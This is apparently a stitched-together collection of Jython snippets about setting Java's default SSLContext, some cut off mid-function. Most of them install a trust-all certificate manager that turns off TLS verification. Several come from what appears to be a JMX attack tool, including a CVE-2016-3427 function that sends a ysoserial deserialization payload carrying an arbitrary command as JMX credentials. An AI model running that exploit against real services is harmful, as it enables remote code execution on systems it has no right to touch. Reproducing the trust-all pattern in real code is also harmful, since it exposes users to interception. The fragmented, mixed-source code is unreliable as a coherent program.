def connectToJMX(args): # Basic JMX connection, always required trust_managers = array([TrustAllX509TrustManager()], TrustManager) sc = SSLContext.getInstance("SSL") sc.init(None, trust_managers, None) SSLContext.setDefault(sc) jmx_url = JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + args.targetHost + ":" + args.targetPort + "/jmxrmi") print "[+] Connecting to: " + str(jmx_url) try: # for passing credentials for password if args.jmxpassword and args.jmxrole: print("[+] Using credentials: " + str(args.jmxrole) + " / " + str(args.jmxpassword)) credentials = array([args.jmxrole, args.jmxpassword], String) environment = {JMXConnector.CREDENTIALS: credentials} jmx_connector = JMXConnectorFactory.connect(jmx_url, environment) else: jmx_connector = JMXConnectorFactory.connect(jmx_url) print "[+] Connected: " + str(jmx_connector.getConnectionId()) bean_server = jmx_connector.getMBeanServerConnection() return bean_server except: print "[-] Error: Can't connect to remote service" if "Authentication failed! Invalid username or password" in str( sys.exc_info()[1]): print "[-] Authentication failed! Invalid username or password" sys.exit(-1)
def trust_all_certs(): # Create a static reference to an SSLContext which will use # our custom TrustManager trust_managers = array([TrustAllX509TrustManager()], TrustManager) TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL") TRUST_ALL_CONTEXT.init(None, trust_managers, None) SSLContext.setDefault(TRUST_ALL_CONTEXT)
def disable_all_ssl_cert_checks(self): from javax.net.ssl import TrustManager, X509TrustManager from jarray import array from javax.net.ssl import SSLContext class TrustAllX509TrustManager(X509TrustManager): """ Define a custom TrustManager which will blindly accept all certificates """ def checkClientTrusted(self, chain, auth): pass def checkServerTrusted(self, chain, auth): pass def getAcceptedIssuers(self): return None # Create a static reference to an SSLContext which will use # our custom TrustManager self.log.info("Disabling cert check ##############") trust_managers = array([TrustAllX509TrustManager()], TrustManager) TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL") TRUST_ALL_CONTEXT.init(None, trust_managers, None) SSLContext.setDefault(TRUST_ALL_CONTEXT) # Keep a static reference to the JVM's default SSLContext for restoring # at a later time DEFAULT_CONTEXT = SSLContext.getDefault()
def _enableTrustAllCertificates(cls, enable=True): logger.info('Enable trust all certs') cls.initSSL() from javax.net.ssl import SSLContext if enable and TrustAllCert.TRUST_ALL_CONTEXT: SSLContext.setDefault(TrustAllCert.TRUST_ALL_CONTEXT) elif TrustAllCert.DEFAULT_CONTEXT: SSLContext.setDefault(TrustAllCert.DEFAULT_CONTEXT)
def trust_all_certificates(): """Blindly trusts all certificates; note this is a per-JVM process setting.""" if not TrustAllCertificates._blind_trust: print >> sys.stderr, "Trusting all certificates without verifying them for this process." print >> sys.stderr, "It would be best to install certificates in the JVM's trust store." print >> sys.stderr, "Currently there is no way to turn this off." trust_managers = array(TrustManager, [TrustAllX509TrustManager()]) trust_all_context = SSLContext.getInstance("SSL") trust_all_context.init(None, trust_managers, None) SSLContext.setDefault(trust_all_context) TrustAllCertificates._blind_trust = True
def wrapped(*args, **kwargs): # Only do this if running under Jython if 'java' in sys.platform: from javax.net.ssl import SSLContext SSLContext.setDefault(TRUST_ALL_CONTEXT) try: res = f(*args, **kwargs) return res finally: SSLContext.setDefault(DEFAULT_CONTEXT) else: return f(*args, **kwargs)
def trust_all_certificates(): """Blindly trusts all certificates; note this is a per-JVM process setting.""" global _blind_trust if not _blind_trust: print >> sys.stderr, "Trusting all certificates without verifying them for this process." print >> sys.stderr, "It would be best to install certificates in the JVM's trust store." print >> sys.stderr, "Currently there is no way to turn this off." trust_managers = array(TrustManager, [TrustAllX509TrustManager()]) trust_all_context = SSLContext.getInstance("SSL") trust_all_context.init(None, trust_managers, None) SSLContext.setDefault(trust_all_context) _blind_trust = True
def trust_all_certificates(request): '''Decorator function that will make it so the context of the decorated method will run with our TrustManager that accepts all certificates''' # Only do this if running under Jython is_java = 'java' in sys.platform if is_java: from javax.net.ssl import SSLContext SSLContext.setDefault(TRUST_ALL_CONTEXT) def fin(): if is_java: SSLContext.setDefault(DEFAULT_CONTEXT) request.addfinalizer(fin)
def trustSpecificCertificate(self, pemCertificateFile, pemCertificateAlias): from java.io import BufferedInputStream, FileInputStream from java.security import KeyStore from java.security.cert import CertificateFactory, X509Certificate from javax.net.ssl import SSLContext, TrustManagerFactory fis = FileInputStream(pemCertificateFile) bis = BufferedInputStream(fis) ca = CertificateFactory.getInstance("X.509").generateCertificate(bis) ks = KeyStore.getInstance(KeyStore.getDefaultType()) ks.load(None, None) ks.setCertificateEntry(pemCertificateAlias, ca) tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm()) tmf.init(ks) context = SSLContext.getInstance("SSL") context.init(None, tmf.getTrustManagers(), None) SSLContext.setDefault(context)
def trustAllCertificate(self): from javax.net.ssl import TrustManager, X509TrustManager from jarray import array from javax.net.ssl import SSLContext class TrustAllX509TrustManager(X509TrustManager): def checkClientTrusted(self, chain, auth): pass def checkServerTrusted(self, chain, auth): pass def getAcceptedIssuers(self): return None trust_managers = array([TrustAllX509TrustManager()], TrustManager) TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL") TRUST_ALL_CONTEXT.init(None, trust_managers, None) SSLContext.setDefault(TRUST_ALL_CONTEXT)
def connectToJMX(args): # Basic JMX connection, always required trust_managers = array([TrustAllX509TrustManager()], TrustManager) sc = SSLContext.getInstance("SSL") sc.init(None, trust_managers, None) SSLContext.setDefault(sc) if args.jmxmp: jmx_url = jmxmp_url(args) else: jmx_url = jxmrmi_url(args) # import after url in order to import the correct protocol implementation from javax.management.remote import JMXConnector from javax.management.remote import JMXConnectorFactory print "[+] Connecting to: " + str(jmx_url) try: # for passing credentials for password if args.jmxpassword and args.jmxrole: print("[+] Using credentials: " + str(args.jmxrole) + " / " + str(args.jmxpassword)) credentials = array([args.jmxrole, args.jmxpassword], String) environment = {JMXConnector.CREDENTIALS: credentials} jmx_connector = JMXConnectorFactory.connect(jmx_url, environment) else: jmx_connector = JMXConnectorFactory.connect(jmx_url) print "[+] Connected: " + str(jmx_connector.getConnectionId()) bean_server = jmx_connector.getMBeanServerConnection() return bean_server except: print "[-] Error: Can't connect to remote service" if "Authentication failed! Invalid username or password" in str( sys.exc_info()[1]): print "[-] Authentication failed! Invalid username or password" if "Connection refused to host: 127.0.0.1" in str(sys.exc_info()): print "[-] Connection refused to 127.0.0.1! Try the localhost_bypass" sys.exit(-1)
def connectToJMX(args): # Basic JMX connection, always required trust_managers = array([TrustAllX509TrustManager()], TrustManager) sc = SSLContext.getInstance("SSL") sc.init(None, trust_managers, None) SSLContext.setDefault(sc) jmx_url = JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + args.targetHost + ":" + args.targetPort + "/jmxrmi") print "[+] Connecting to: " + str(jmx_url) try: jmx_connector = JMXConnectorFactory.connect(jmx_url) print "[+] Connected: " + str(jmx_connector.getConnectionId()) bean_server = jmx_connector.getMBeanServerConnection() return bean_server except IOException: print "[-] Error: Can't connect to remote service" sys.exit(-1)
def trustSpecificCertificate(self, pemCertificateFile, pemCertificateAlias): from java.io import BufferedInputStream, FileInputStream from java.security import KeyStore from java.security.cert import CertificateFactory, X509Certificate from javax.net.ssl import SSLContext, TrustManagerFactory fis = FileInputStream(pemCertificateFile) bis = BufferedInputStream(fis) ca = CertificateFactory.getInstance("X.509").generateCertificate(bis) ks = KeyStore.getInstance(KeyStore.getDefaultType()) ks.load(None, None) ks.setCertificateEntry(pemCertificateAlias, ca) tmf = TrustManagerFactory.getInstance( TrustManagerFactory.getDefaultAlgorithm()) tmf.init(ks) context = SSLContext.getInstance("SSL") context.init(None, tmf.getTrustManagers(), None) SSLContext.setDefault(context)
def cve_2016_3427Mode(args): if not os.path.isfile('./jars/ysoserial.jar'): print "[-] Error: Did not find ysoserial.jar in jars directory. Please download it from https://github.com/frohoff/ysoserial and move it in the jars directory" sys.exit(1) sys.path.append("./jars/ysoserial.jar") print "[+] Added ysoserial API capacities" from ysoserial.payloads.ObjectPayload import Utils payload_object = Utils.makePayloadObject(args.gadget, args.cmd) trust_managers = array([TrustAllX509TrustManager()], TrustManager) sc = SSLContext.getInstance("SSL") sc.init(None, trust_managers, None) SSLContext.setDefault(sc) from javax.management.remote import JMXConnector from javax.management.remote import JMXConnectorFactory jmx_url = jxmrmi_url(args) print "[+] Connecting to: " + str(jmx_url) try: environment = {JMXConnector.CREDENTIALS: payload_object} jmx_connector = JMXConnectorFactory.connect(jmx_url, environment) except: if "java.io.InvalidClassException: filter status: REJECTED" in str( sys.exc_info()): print "[-] Not vulnerable" elif "Credentials should be String[]" in str(sys.exc_info()): print "[+] Object was deserialized, target could be vulnerable" print "[?]: Returned error: " print str(sys.exc_info()) print "[+] Done"
def fin(): if is_java: SSLContext.setDefault(DEFAULT_CONTEXT)
def enableTrustAllCertificates(cls): logger.info('Enable trust all certs') cls.initSSL() from javax.net.ssl import SSLContext SSLContext.setDefault(TrustAllCert.TRUST_ALL_CONTEXT)
class TrustAllX509TrustManager(X509TrustManager): '''Define a custom TrustManager which will blindly accept all certificates''' def checkClientTrusted(self, chain, auth): pass def checkServerTrusted(self, chain, auth): pass def getAcceptedIssuers(self): return None # Create a static reference to an SSLContext which will use # our custom TrustManager trust_managers = array([TrustAllX509TrustManager()], TrustManager) TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL") TRUST_ALL_CONTEXT.init(None, trust_managers, None) SSLContext.setDefault(TRUST_ALL_CONTEXT) class TestClient(threading.Thread): TOTAL_COUNT = 0 IS_EXIT = False def __init__(self, host, port=None): threading.Thread.__init__(self, name=threading.active_count()) self.host = host self.port = port self.conn = HTTPSConnection(self.host, self.port, timeout=ARGS.BATCH_SIZE*ARGS.BATCHES/2) self.count = 0 #random.shuffle(TestClient.ids) self.ids = list(TestClient.ids) print(self.ids[0])
pass def getAcceptedIssuers(self): return None # Create a static reference to an SSLContext which will use # our custom TrustManager trust_managers = array([TrustAllX509TrustManager()], TrustManager) TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL") TRUST_ALL_CONTEXT.init(None, trust_managers, None) # Keep a static reference to the JVM's default SSLContext for restoring # at a later time DEFAULT_CONTEXT = SSLContext.getDefault() if 'create_default_context' not in dir(ssl): SSLContext.setDefault(TRUST_ALL_CONTEXT) except: pass def urlopen(request, verify): ctx = None if 'create_default_context' in dir(ssl): ctx = ssl.create_default_context() elif 'SSLContext' in dir(ssl) and 'PROTOCOL_TLSv1' in dir(ssl): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) if not verify and ctx: ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE return urllib_request.urlopen(request, context=ctx)